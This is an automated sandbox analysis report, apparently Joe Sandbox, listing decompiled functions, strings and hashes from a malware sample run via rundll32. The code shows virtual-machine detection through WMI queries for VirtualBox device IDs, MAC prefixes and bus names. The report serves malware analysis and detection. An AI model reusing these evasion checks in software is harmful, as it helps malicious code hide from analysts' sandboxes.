                                        • Opcode ID: 45052863cfe297d0571556694e1f3448e50ac1587db9c284639e699be79b2aaf
                                        • Instruction ID: 156cbe7ad4cbf150603339684e34f9d69d9318866c6406197e7a1f29fd476b90
                                        • Opcode Fuzzy Hash: 45052863cfe297d0571556694e1f3448e50ac1587db9c284639e699be79b2aaf
                                        • Instruction Fuzzy Hash: 42810436641B80CAEB10DF39E4947AD33A5FB84B88F04A516DE6D87A68DF34C659C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871F520 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 142memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1039 1c33871f520-1c33871f547 call 1c3387211c0 1042 1c33871f723-1c33871f72b 1039->1042 1043 1c33871f54d-1c33871f58d call 1c3388445f8 * 2 1039->1043 1048 1c33871f5e4-1c33871f5e7 1043->1048 1049 1c33871f58f-1c33871f592 1043->1049 1052 1c33871f5e9-1c33871f5ec SysFreeString 1048->1052 1053 1c33871f5f2-1c33871f5fa 1048->1053 1050 1c33871f594-1c33871f5b0 1049->1050 1051 1c33871f5db-1c33871f5de SysFreeString 1049->1051 1056 1c33871f5ba-1c33871f5bc 1050->1056 1051->1048 1052->1053 1054 1c33871f70b-1c33871f722 1053->1054 1055 1c33871f600-1c33871f612 1053->1055 1057 1c33871f618 1055->1057 1058 1c33871f6eb-1c33871f705 CoUninitialize 1055->1058 1056->1051 1059 1c33871f5be-1c33871f5d5 CoUninitialize 1056->1059 1060 1c33871f620-1c33871f63c 1057->1060 1058->1054 1059->1051 1064 1c33871f6dc 1060->1064 1065 1c33871f642-1c33871f660 1060->1065 1067 1c33871f6e0-1c33871f6e3 1064->1067 1069 1c33871f666-1c33871f668 1065->1069 1067->1058 1070 1c33871f6e5-1c33871f6e7 1067->1070 1072 1c33871f6c3-1c33871f6d4 1069->1072 1073 1c33871f66a-1c33871f672 1069->1073 1070->1058 1072->1060 1078 1c33871f6da 1072->1078 1073->1072 1074 1c33871f674-1c33871f676 1073->1074 1076 1c33871f6b9-1c33871f6bd VariantClear 1074->1076 1077 1c33871f678-1c33871f68b call 1c33880e5b0 1074->1077 1076->1072 1081 1c33871f6b7 1077->1081 1082 1c33871f68d-1c33871f6a0 call 1c33880e5b0 1077->1082 1078->1067 1081->1076 1082->1081 1085 1c33871f6a2-1c33871f6b5 call 1c33880e5b0 1082->1085 1085->1076 1085->1081
                                        C-Code - Quality: 26%
                                        			E000001C31C33871F520(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, long long __r15, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				intOrPtr _v72;
				signed short _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* _t53;
				void* _t54;
				signed char _t60;
				intOrPtr _t99;
				intOrPtr* _t112;
				long long _t133;
				long long _t134;
				void* _t145;

				_t134 = __rsi;
				_a24 = _t133;
				_v88 = _t133;
				_a16 = _t133;
				_t54 = E000001C31C3387211C0(_t53,  &_a24,  &_v88, __rsi); // executed
				if (_t54 == 0) goto 0x3871f723;
				_v24 = __rbx;
				_v32 = _t134;
				_v40 = __r14;
				_v48 = __r15;
				__imp__#2();
				_t135 = __rax;
				__imp__#2();
				r15d = 1;
				_t102 = __rax;
				r14d = r15d;
				if (__rax == 0) goto 0x3871f5e4;
				if (__rax == 0) goto 0x3871f5db;
				_v96 =  &_a16;
				_t13 = _t133 + 0x30; // 0x31
				r9d = _t13;
				_v104 = _t133;
				_t144 =  *_a24;
				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0x3871f5db;
				r14d = 0;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0x3871f5f2;
				__imp__#6();
				if (r14d == 0) goto 0x3871f70b;
				_t112 = _a16;
				_a32 = _t133;
				_a8 = 0;
				if (_t112 == 0) goto 0x3871f6eb;
				_v104 =  &_a8;
				r8d = r15d; // executed
				 *((intOrPtr*)( *_t112 + 0x20))();
				if (_a8 == 0) goto 0x3871f6dc;
				_v96 = _t133;
				r8d = 0;
				_v104 = _t133;
				_t99 =  *_a32; // executed
				if ( *((intOrPtr*)(_t99 + 0x20))() < 0) goto 0x3871f6c3;
				_t60 = _v80 & 0x0000ffff;
				if (_t60 == r15w) goto 0x3871f6c3;
				if ((_t60 & 0x00000008) == 0) goto 0x3871f6b9;
				E000001C31C33880E5B0(__rax, _v72, L"ACPIBus_BUS_0", __rax,  *_a24, _t145);
				if (_t99 != 0) goto 0x3871f6b7;
				E000001C31C33880E5B0(_t102, _v72, L"PCI_BUS_0", _t135, _t144, _t145);
				if (_t99 != 0) goto 0x3871f6b7;
				E000001C31C33880E5B0(_t102, _v72, L"PNP_BUS_0", _t135, _t144, _t145);
				if (_t99 == 0) goto 0x3871f6b9;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_a16 != 0) goto 0x3871f620;
				goto 0x3871f6e0;
				if (1 != 3) goto 0x3871f6eb;
				_t74 =  ==  ? r15d : 0;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize(); // executed
				_t68 =  ==  ? r15d : 0;
				return  ==  ? r15d : 0;
			}




















                                        0x1c33871f520
                                        0x1c33871f534
                                        0x1c33871f538
                                        0x1c33871f53c
                                        0x1c33871f540
                                        0x1c33871f547
                                        0x1c33871f54d
                                        0x1c33871f559
                                        0x1c33871f55e
                                        0x1c33871f563
                                        0x1c33871f568
                                        0x1c33871f575
                                        0x1c33871f578
                                        0x1c33871f57e
                                        0x1c33871f584
                                        0x1c33871f587
                                        0x1c33871f58d
                                        0x1c33871f592
                                        0x1c33871f59c
                                        0x1c33871f5a1
                                        0x1c33871f5a1
                                        0x1c33871f5a8
                                        0x1c33871f5b0
                                        0x1c33871f5bc
                                        0x1c33871f5c2
                                        0x1c33871f5c8
                                        0x1c33871f5d2
                                        0x1c33871f5d5
                                        0x1c33871f5de
                                        0x1c33871f5e7
                                        0x1c33871f5ec
                                        0x1c33871f5fa
                                        0x1c33871f600
                                        0x1c33871f606
                                        0x1c33871f60c
                                        0x1c33871f612
                                        0x1c33871f627
                                        0x1c33871f633
                                        0x1c33871f636
                                        0x1c33871f63c
                                        0x1c33871f64a
                                        0x1c33871f656
                                        0x1c33871f659
                                        0x1c33871f660
                                        0x1c33871f668
                                        0x1c33871f66a
                                        0x1c33871f672
                                        0x1c33871f676
                                        0x1c33871f683
                                        0x1c33871f68b
                                        0x1c33871f698
                                        0x1c33871f6a0
                                        0x1c33871f6ad
                                        0x1c33871f6b5
                                        0x1c33871f6bd
                                        0x1c33871f6ca
                                        0x1c33871f6d4
                                        0x1c33871f6da
                                        0x1c33871f6e3
                                        0x1c33871f6e7
                                        0x1c33871f6ee
                                        0x1c33871f6f8
                                        0x1c33871f702
                                        0x1c33871f705
                                        0x1c33871f710
                                        0x1c33871f722

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$wcsstr$AllocFreeUninitialize$ClearInitializeVariant
                                        • String ID: ACPIBus_BUS_0$Name$PCI_BUS_0$PNP_BUS_0$SELECT * FROM Win32_Bus$WQL
                                        • API String ID: 2365594256-2399075642
                                        • Opcode ID: a083f4136500c1d7388cb6dbd791f7449bf228b3f2852ad9c909687787008122
                                        • Instruction ID: 2404ea713da3c42564c6ec1a169aad200dae07598c823d48dc9535199254a9c8
                                        • Opcode Fuzzy Hash: a083f4136500c1d7388cb6dbd791f7449bf228b3f2852ad9c909687787008122
                                        • Instruction Fuzzy Hash: 4B515B76340B8086FB108F25E844ADC67A5FB84B98F14A517DE6E47B69DF38C646C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871F120 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 133memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1088 1c33871f120-1c33871f14d call 1c3387211c0 1091 1c33871f153-1c33871f193 call 1c3388445f8 * 2 1088->1091 1092 1c33871f2ec-1c33871f2f6 1088->1092 1097 1c33871f195-1c33871f198 1091->1097 1098 1c33871f1ea-1c33871f1f2 1091->1098 1099 1c33871f19a-1c33871f1b6 1097->1099 1100 1c33871f1e1-1c33871f1e4 SysFreeString 1097->1100 1101 1c33871f1f4-1c33871f1f7 SysFreeString 1098->1101 1102 1c33871f1fd-1c33871f20a 1098->1102 1107 1c33871f1c0-1c33871f1c2 1099->1107 1100->1098 1101->1102 1103 1c33871f2dc-1c33871f2eb 1102->1103 1104 1c33871f210-1c33871f21f 1102->1104 1105 1c33871f225-1c33871f22f 1104->1105 1106 1c33871f2b8-1c33871f2d6 CoUninitialize 1104->1106 1108 1c33871f230-1c33871f24d 1105->1108 1106->1103 1107->1100 1109 1c33871f1c4-1c33871f1db CoUninitialize 1107->1109 1108->1106 1113 1c33871f24f-1c33871f26b 1108->1113 1109->1100 1116 1c33871f271-1c33871f273 1113->1116 1118 1c33871f275-1c33871f27a 1116->1118 1119 1c33871f29d-1c33871f2a9 1116->1119 1120 1c33871f293-1c33871f297 VariantClear 1118->1120 1121 1c33871f27c-1c33871f28f call 1c33880e5b0 1118->1121 1119->1106 1124 1c33871f2ab-1c33871f2b2 1119->1124 1120->1119 1121->1120 1124->1106 1124->1108
                                        C-Code - Quality: 20%
                                        			E000001C31C33871F120(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				intOrPtr _v72;
				short _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rbx;
				void* _t49;
				void* _t50;
				void* _t63;
				void* _t86;
				intOrPtr* _t95;
				long long _t115;
				void* _t126;
				long long _t131;

				_t115 = __rsi;
				r15d = 0;
				_a16 = _t131;
				_v88 = _t131;
				_a24 = _t131;
				_t50 = E000001C31C3387211C0(_t49,  &_a16,  &_v88, __rsi); // executed
				if (_t50 == 0) goto 0x3871f2ec;
				_v32 = _t115;
				_v40 = __rdi;
				_v48 = __r12;
				_v56 = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0x3871f1ea;
				if (__rax == 0) goto 0x3871f1e1;
				_v96 =  &_a24;
				_t13 = _t131 + 0x30; // 0x30
				r9d = _t13;
				_v104 = _t131;
				if ( *((intOrPtr*)( *_a16 + 0xa0))() >= 0) goto 0x3871f1e1;
				r14d = r15d;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0x3871f1fd;
				__imp__#6();
				if (r14d == 0) goto 0x3871f2dc;
				_t95 = _a24;
				_a32 = _t131;
				_a8 = r15d;
				if (_t95 == 0) goto 0x3871f2b8;
				asm("o16 nop [eax+eax]");
				_v104 =  &_a8;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t95 + 0x20))();
				if (_a8 == r15d) goto 0x3871f2b8;
				_v96 = _t131;
				r8d = 0;
				_v104 = _t131;
				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0x3871f29d;
				if (_v80 != 8) goto 0x3871f293;
				E000001C31C33880E5B0(_t86, _v72, L"PCI\\VEN_80EE&DEV_CAFE", _v32,  *_a16, _t126);
				_t63 =  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_t63 != 0) goto 0x3871f2b8;
				if (_a24 != 0) goto 0x3871f230;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t63;
			}





















                                        0x1c33871f120
                                        0x1c33871f12c
                                        0x1c33871f137
                                        0x1c33871f13b
                                        0x1c33871f142
                                        0x1c33871f146
                                        0x1c33871f14d
                                        0x1c33871f153
                                        0x1c33871f15f
                                        0x1c33871f164
                                        0x1c33871f169
                                        0x1c33871f16e
                                        0x1c33871f17e
                                        0x1c33871f184
                                        0x1c33871f18d
                                        0x1c33871f193
                                        0x1c33871f198
                                        0x1c33871f1a2
                                        0x1c33871f1a7
                                        0x1c33871f1a7
                                        0x1c33871f1ae
                                        0x1c33871f1c2
                                        0x1c33871f1c8
                                        0x1c33871f1ce
                                        0x1c33871f1d8
                                        0x1c33871f1db
                                        0x1c33871f1e4
                                        0x1c33871f1f2
                                        0x1c33871f1f7
                                        0x1c33871f20a
                                        0x1c33871f210
                                        0x1c33871f214
                                        0x1c33871f218
                                        0x1c33871f21f
                                        0x1c33871f225
                                        0x1c33871f237
                                        0x1c33871f243
                                        0x1c33871f246
                                        0x1c33871f24d
                                        0x1c33871f257
                                        0x1c33871f263
                                        0x1c33871f266
                                        0x1c33871f273
                                        0x1c33871f27a
                                        0x1c33871f287
                                        0x1c33871f28f
                                        0x1c33871f297
                                        0x1c33871f2a4
                                        0x1c33871f2a9
                                        0x1c33871f2b2
                                        0x1c33871f2bf
                                        0x1c33871f2c9
                                        0x1c33871f2d3
                                        0x1c33871f2d6
                                        0x1c33871f2eb

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                                        • String ID: DeviceId$PCI\VEN_80EE&DEV_CAFE$SELECT * FROM Win32_PnPEntity$WQL
                                        • API String ID: 1998430482-342862491
                                        • Opcode ID: 3218fba4ad21c45b7ae122e866a02fcffa20ebf14e771e57533e5baf3741b95b
                                        • Instruction ID: 61dd40fc8c26b32d4f1d5324f26f2feaa9e24f151683e2b38b0159531b3b36be
                                        • Opcode Fuzzy Hash: 3218fba4ad21c45b7ae122e866a02fcffa20ebf14e771e57533e5baf3741b95b
                                        • Instruction Fuzzy Hash: 50516937301B9086EB10DF25E884A9D77A4F788F98F04A516EE6E07B58DF38C685C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871EA40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 130memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1126 1c33871ea40-1c33871ea6d call 1c3387211c0 1129 1c33871ec15-1c33871ec1f 1126->1129 1130 1c33871ea73-1c33871eab3 call 1c3388445f8 * 2 1126->1130 1135 1c33871eab5-1c33871eab8 1130->1135 1136 1c33871eb0a-1c33871eb12 1130->1136 1137 1c33871eaba-1c33871ead6 1135->1137 1138 1c33871eb01-1c33871eb04 SysFreeString 1135->1138 1139 1c33871eb14-1c33871eb17 SysFreeString 1136->1139 1140 1c33871eb1d-1c33871eb2a 1136->1140 1145 1c33871eae0-1c33871eae2 1137->1145 1138->1136 1139->1140 1141 1c33871ec05-1c33871ec14 1140->1141 1142 1c33871eb30-1c33871eb3f 1140->1142 1143 1c33871ebe5-1c33871ebff CoUninitialize 1142->1143 1144 1c33871eb45 1142->1144 1143->1141 1146 1c33871eb50-1c33871eb6d 1144->1146 1145->1138 1147 1c33871eae4-1c33871eafb CoUninitialize 1145->1147 1151 1c33871ebe1 1146->1151 1152 1c33871eb6f-1c33871eb8b 1146->1152 1147->1138 1151->1143 1155 1c33871eb91-1c33871eb93 1152->1155 1157 1c33871eb95-1c33871eb9d 1155->1157 1158 1c33871ebc4-1c33871ebd0 1155->1158 1157->1158 1159 1c33871eb9f-1c33871eba1 1157->1159 1158->1151 1163 1c33871ebd2-1c33871ebd9 1158->1163 1161 1c33871eba3-1c33871ebb6 call 1c33880e5b0 1159->1161 1162 1c33871ebba-1c33871ebbe VariantClear 1159->1162 1161->1162 1162->1158 1163->1146 1165 1c33871ebdf 1163->1165 1165->1143
                                        C-Code - Quality: 20%
                                        			E000001C31C33871EA40(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				intOrPtr _v72;
				signed short _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rbx;
				void* _t51;
				void* _t52;
				signed char _t58;
				void* _t66;
				void* _t90;
				intOrPtr* _t99;
				long long _t119;
				void* _t130;
				long long _t135;

				_t119 = __rsi;
				r15d = 0;
				_a24 = _t135;
				_v88 = _t135;
				_a16 = _t135;
				_t52 = E000001C31C3387211C0(_t51,  &_a24,  &_v88, __rsi); // executed
				if (_t52 == 0) goto 0x3871ec15;
				_v32 = _t119;
				_v40 = __rdi;
				_v48 = __r12;
				_v56 = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0x3871eb0a;
				if (__rax == 0) goto 0x3871eb01;
				_v96 =  &_a16;
				_t13 = _t135 + 0x30; // 0x30
				r9d = _t13;
				_v104 = _t135;
				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0x3871eb01;
				r14d = r15d;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0x3871eb1d;
				__imp__#6();
				if (r14d == 0) goto 0x3871ec05;
				_t99 = _a16;
				_a32 = _t135;
				_a8 = r15d;
				if (_t99 == 0) goto 0x3871ebe5;
				asm("o16 nop [eax+eax]");
				_v104 =  &_a8;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t99 + 0x20))();
				if (_a8 == r15d) goto 0x3871ebe1;
				_v96 = _t135;
				r8d = 0;
				_v104 = _t135;
				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0x3871ebc4;
				_t58 = _v80 & 0x0000ffff;
				if (_t58 == r12w) goto 0x3871ebc4;
				if ((_t58 & 0x00000008) == 0) goto 0x3871ebba;
				E000001C31C33880E5B0(_t90, _v72, L"08:00:27", _v32,  *_a24, _t130);
				_t66 =  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_t66 != 0) goto 0x3871ebe1;
				if (_a16 != 0) goto 0x3871eb50;
				goto 0x3871ebe5;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t66;
			}






















                                        0x1c33871ea40
                                        0x1c33871ea4c
                                        0x1c33871ea57
                                        0x1c33871ea5b
                                        0x1c33871ea62
                                        0x1c33871ea66
                                        0x1c33871ea6d
                                        0x1c33871ea73
                                        0x1c33871ea7f
                                        0x1c33871ea84
                                        0x1c33871ea89
                                        0x1c33871ea8e
                                        0x1c33871ea9e
                                        0x1c33871eaa4
                                        0x1c33871eaad
                                        0x1c33871eab3
                                        0x1c33871eab8
                                        0x1c33871eac2
                                        0x1c33871eac7
                                        0x1c33871eac7
                                        0x1c33871eace
                                        0x1c33871eae2
                                        0x1c33871eae8
                                        0x1c33871eaee
                                        0x1c33871eaf8
                                        0x1c33871eafb
                                        0x1c33871eb04
                                        0x1c33871eb12
                                        0x1c33871eb17
                                        0x1c33871eb2a
                                        0x1c33871eb30
                                        0x1c33871eb34
                                        0x1c33871eb38
                                        0x1c33871eb3f
                                        0x1c33871eb45
                                        0x1c33871eb57
                                        0x1c33871eb63
                                        0x1c33871eb66
                                        0x1c33871eb6d
                                        0x1c33871eb77
                                        0x1c33871eb83
                                        0x1c33871eb86
                                        0x1c33871eb93
                                        0x1c33871eb95
                                        0x1c33871eb9d
                                        0x1c33871eba1
                                        0x1c33871ebae
                                        0x1c33871ebb6
                                        0x1c33871ebbe
                                        0x1c33871ebcb
                                        0x1c33871ebd0
                                        0x1c33871ebd9
                                        0x1c33871ebdf
                                        0x1c33871ebe8
                                        0x1c33871ebf2
                                        0x1c33871ebfc
                                        0x1c33871ebff
                                        0x1c33871ec14

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                                        • String ID: 08:00:27$MACAddress$SELECT * FROM Win32_NetworkAdapterConfiguration$WQL
                                        • API String ID: 1998430482-232164535
                                        • Opcode ID: 41be8ad4be726218d2bc0a84efcb0ac671832ba251f9ec78ef80c29be519ad74
                                        • Instruction ID: d6f53f0413c890dbff4f1b3c2ae73e84168cbd3322a1937d4ec05b5b87984bf7
                                        • Opcode Fuzzy Hash: 41be8ad4be726218d2bc0a84efcb0ac671832ba251f9ec78ef80c29be519ad74
                                        • Instruction Fuzzy Hash: DB515837301B9086EB209F25E884A9D77A1F784F98F04A516EE6E47F58DF38C685C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871E6A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                                        • String ID: %ProgramW6432%
                                        • API String ID: 3127241168-1092591020
                                        • Opcode ID: e31e6983fb8e730e6e55048d195789d7b53ff78273e7e147f474fbb06369237e
                                        • Instruction ID: 578b10eb3e1d0691d0a67d0489d443dae4ad8f3977146e1d7cebd76c3564af28
                                        • Opcode Fuzzy Hash: e31e6983fb8e730e6e55048d195789d7b53ff78273e7e147f474fbb06369237e
                                        • Instruction Fuzzy Hash: 3E31A531654AC491FB219B28E406BE96371FFD4308F44A113DEA94BAA5EF3DC356CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338720590 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 18%
                                        			E000001C31C338720590(void* __r9) {
				signed long long _v24;
				char _v552;
				void* _v1080;
				char _v1584;
				void* _v1608;
				signed char _t17;
				void* _t19;
				void* _t23;
				void* _t24;
				signed long long _t29;
				void* _t38;
				void* _t41;
				signed long long _t42;
				void* _t43;
				void* _t45;

				_t45 = __r9;
				_t29 =  *0x38903000; // 0x9bfaf736ae76
				_v24 = _t29 ^ _t42;
				r8d = 0x208;
				E000001C31C33880E410(_t19, 0, _t23, _t24,  &_v552, _t38, _t41, _t43);
				asm("movups xmm0, [0x19866b]");
				asm("movsd xmm1, [0x19866c]");
				r8d = 0x1f0;
				asm("movaps [esp+0x20], xmm0");
				asm("movsd [esp+0x30], xmm1");
				E000001C31C33880E410(_t19, 0, _t23, _t24,  &_v1584, _t38, _t41, _t43);
				if (E000001C31C338720E50() == 0) goto 0x38720610;
				r8d = 0x104;
				ExpandEnvironmentStringsW(??, ??, ??);
				goto 0x3872061f;
				r9d = 0;
				_t5 = _t45 + 0x26; // 0x26
				r8d = _t5;
				__imp__SHGetSpecialFolderPathW();
				__imp__PathCombineW();
				_t17 = GetFileAttributesW(??); // executed
				if (_t17 == 0xffffffff) goto 0x3872066e;
				if ((_t17 & 0x00000010) == 0) goto 0x3872066e;
				E000001C31C33880C290();
				return 1;
			}


















                                        0x1c338720590
                                        0x1c338720597
                                        0x1c3387205a1
                                        0x1c3387205b3
                                        0x1c3387205b9
                                        0x1c3387205be
                                        0x1c3387205cc
                                        0x1c3387205d4
                                        0x1c3387205da
                                        0x1c3387205df
                                        0x1c3387205e5
                                        0x1c3387205f9
                                        0x1c3387205fb
                                        0x1c338720608
                                        0x1c33872060e
                                        0x1c338720610
                                        0x1c338720615
                                        0x1c338720615
                                        0x1c338720619
                                        0x1c338720634
                                        0x1c338720642
                                        0x1c33872064b
                                        0x1c33872064f
                                        0x1c338720661
                                        0x1c33872066d

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                                        • String ID: %ProgramW6432%
                                        • API String ID: 3127241168-1092591020
                                        • Opcode ID: f4e446950c117aaa7a5b22abb95a2542fa7d5a0f251ada8163812decc7223617
                                        • Instruction ID: 528ff0ed86b3dbc287d8ee24a2afe51448343be9c7e248b11aa930c3007ea599
                                        • Opcode Fuzzy Hash: f4e446950c117aaa7a5b22abb95a2542fa7d5a0f251ada8163812decc7223617
                                        • Instruction Fuzzy Hash: 1C219F722919C081FB60DB24E856BDA6322FBC9748F80A1139A6A4B9A5DF3DC355CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338811DF0 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 40%
                                        			E000001C31C338811DF0(void* __ecx, void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, char _a24, intOrPtr _a40) {
				long long _v16;
				intOrPtr _v24;
				void* _t12;
				intOrPtr* _t34;
				long long _t35;
				intOrPtr* _t38;

				_t34 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				if (__r8 != 0) goto 0x38811e20;
				_t12 = E000001C31C338818984(__rax);
				 *__rax = 0x16;
				E000001C31C338811BC8(_t12);
				goto 0x38811ea0;
				E000001C31C338811D90(__rax, __rbx, __r8, __r9, __rcx);
				_t38 = _t34;
				if (_t34 == 0) goto 0x38811e70;
				_t35 =  &_a24;
				_v16 = _t35;
				_v24 = _a40;
				CreateThread(??, ??, ??, ??, ??, ??); // executed
				if (_t35 != 0) goto 0x38811eb0;
				E000001C31C338818914(GetLastError(), _t35, _t38);
				if (_t38 == 0) goto 0x38811e9d;
				if ( *((intOrPtr*)(_t38 + 0x10)) == 0) goto 0x38811e86;
				CloseHandle(??);
				if ( *((intOrPtr*)(_t38 + 0x18)) == 0) goto 0x38811e95;
				FreeLibrary(??);
				return E000001C31C338824EE0(_t35, _t38);
			}









                                        0x1c338811df0
                                        0x1c338811df0
                                        0x1c338811df5
                                        0x1c338811e07
                                        0x1c338811e09
                                        0x1c338811e0e
                                        0x1c338811e14
                                        0x1c338811e1b
                                        0x1c338811e26
                                        0x1c338811e2b
                                        0x1c338811e31
                                        0x1c338811e33
                                        0x1c338811e3b
                                        0x1c338811e51
                                        0x1c338811e55
                                        0x1c338811e61
                                        0x1c338811e6b
                                        0x1c338811e75
                                        0x1c338811e7e
                                        0x1c338811e80
                                        0x1c338811e8d
                                        0x1c338811e8f
                                        0x1c338811eaf

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2067211477-0
                                        • Opcode ID: b51c7cb60d147e5c0669e2db15bcc3ed022d0b02608c378374a75aaf55dc55d9
                                        • Instruction ID: 6073fa6121675ebc390963792bb7ee76e2e65a91a86ddfd70bc2dbaf3ee0f694
                                        • Opcode Fuzzy Hash: b51c7cb60d147e5c0669e2db15bcc3ed022d0b02608c378374a75aaf55dc55d9
                                        • Instruction Fuzzy Hash: 6221A43A3417C042FE04CFA1A410AE963A1BF84BC0F08A423DE294B785DF3CC7008642
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338720EE0 Relevance: 7.6, APIs: 5, Instructions: 56registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$OpenQueryValue
                                        • String ID:
                                        • API String ID: 1607946009-0
                                        • Opcode ID: 80fb25d1c761cdd6296609965d16f533f97d65c48d945b5779956fb6042f6aac
